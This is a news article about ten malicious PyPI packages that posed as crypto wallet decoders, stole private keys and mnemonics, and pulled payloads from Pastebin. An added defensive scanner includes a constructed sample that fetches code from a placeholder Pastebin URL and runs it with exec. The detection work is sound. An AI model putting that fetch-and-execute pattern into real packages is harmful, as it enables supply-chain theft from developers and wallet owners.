
PyPI repository infected with crypto-stealing malware


Security researchers have discovered as many as ten malicious packages on the Python Package Index (PyPI) repository. The packages pretended to be legitimate tools for decoding and managing data from multiple popular crypto wallets but were stealing sensitive data from their users. The ten packages have over 3,500 downloads between them.

The attack targeted users of Atomic, Trust Wallet, Metamask, Ronin, TronLink, Exodus, and other popular crypto wallets. The packages promised functionality for crypto users engaged in wallet recovery and management. Behind the scenes, however, they stole sensitive wallet data such as private keys and mnemonic phrases, potentially giving the attackers access to the victims’ funds.

The researchers identified that these packages were published on September 22 to the PyPI repository, a popular place for developers to quickly get extensions that enable specific functionality without writing tons of extra code. The packages distributed their source code across dependencies, separating the main package from the more harmful data-stealing components. They would activate only when specific functions were called to evade detection.

The attack flow of the malicious extensions. | Source: Checkmarx

The attack chain also differs from the usual modus operandi in such cases. Instead of triggering the malicious packages automatically on installation, the packages only fetch another Python package containing the malicious code. They then lay dormant until a specific function is called, upon which they fetch malicious Python code from a Pastebin link and extract sensitive wallet information to the attacker’s server.

PyPI has taken down the malicious packages, but by then, they had amassed a total of 3,782 downloads. A full list with the number of downloads is as follows.

Package name            Number of downloads
atomicdecoderss         366
trondecoderss           240
phantomdecoderss        449
trustdecoderss          466
exodusdecoderss         422
walletdecoderss         232
ccl-localstoragerss     335
exodushcates            415
cipherbcryptors         450
ccl_leveldbases         407

To further obfuscate the code and hide their identity, the attackers did not hardcode the address of their command-and-control server in any of the packages, instead using a Pastebin link to deliver the malicious code. This made code analysis difficult and allowed the attackers to change or update the malicious code without having to update the packages themselves.
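The pattern described above (a function that looks benign until called, then fetches code from a paste site and executes it) is something a defender can look for statically before a package ever runs. The following is an added example, not code from the article or from Checkmarx: a small AST-based scanner that flags functions combining a network fetch with exec/eval, plus any string literal pointing at a paste host. The sample package source it scans is constructed for illustration, and the Pastebin URL in it is a placeholder.

```python
import ast
from dataclasses import dataclass
from typing import List

# Constructed indicators of the behaviour described in the article: a paste-site
# URL and a function that fetches from the network and executes what it fetched.
PASTE_HOSTS = ("pastebin.com",)
FETCH_CALLS = {"urlopen", "get", "post"}   # urllib.request.urlopen, requests.get/post
EXEC_CALLS = {"exec", "eval"}


@dataclass
class Finding:
    where: str     # enclosing function name, or "literal" for a bare string hit
    line: int
    reason: str


def _call_name(node: ast.Call) -> str:
    """Return the bare callee name for both foo(...) and a.b.foo(...)."""
    f = node.func
    return f.id if isinstance(f, ast.Name) else getattr(f, "attr", "")


def scan_source(source: str) -> List[Finding]:
    """Static, offline scan: nothing in `source` is executed."""
    findings: List[Finding] = []
    for node in ast.walk(ast.parse(source)):
        # 1) hard-coded paste-site URLs anywhere in the module
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(h in node.value for h in PASTE_HOSTS):
                findings.append(Finding("literal", node.lineno,
                                        f"paste-site URL: {node.value}"))
        # 2) a single function that both fetches remotely and exec/evals
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            names = {_call_name(c) for c in ast.walk(node) if isinstance(c, ast.Call)}
            if names & FETCH_CALLS and names & EXEC_CALLS:
                findings.append(Finding(node.name, node.lineno,
                                        "network fetch and exec/eval in the same function"))
    return findings


# Constructed sample mimicking the dormant-until-called pattern (placeholder URL).
SAMPLE = '''
import urllib.request

def decode_wallet(path):
    src = urllib.request.urlopen("https://pastebin.com/raw/PLACEHOLDER").read()
    exec(src)
'''

if __name__ == "__main__":
    for f in scan_source(SAMPLE):
        print(f"{f.where}:{f.line}: {f.reason}")
```

Run it over the unpacked source of a package (for example the contents of a downloaded sdist) before installing; a hit is a reason to read the code, not proof of malice.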


Yadullah Abidi

Yadullah is a Computer Science graduate who writes/edits/shoots/codes all things cybersecurity, gaming, and tech hardware. When he's not, he streams himself racing virtual cars. He's been writing and reporting on tech and cybersecurity with websites like Candid.Technology and MakeUseOf since 2018. You can contact him here: yadullahabidi@pm.me.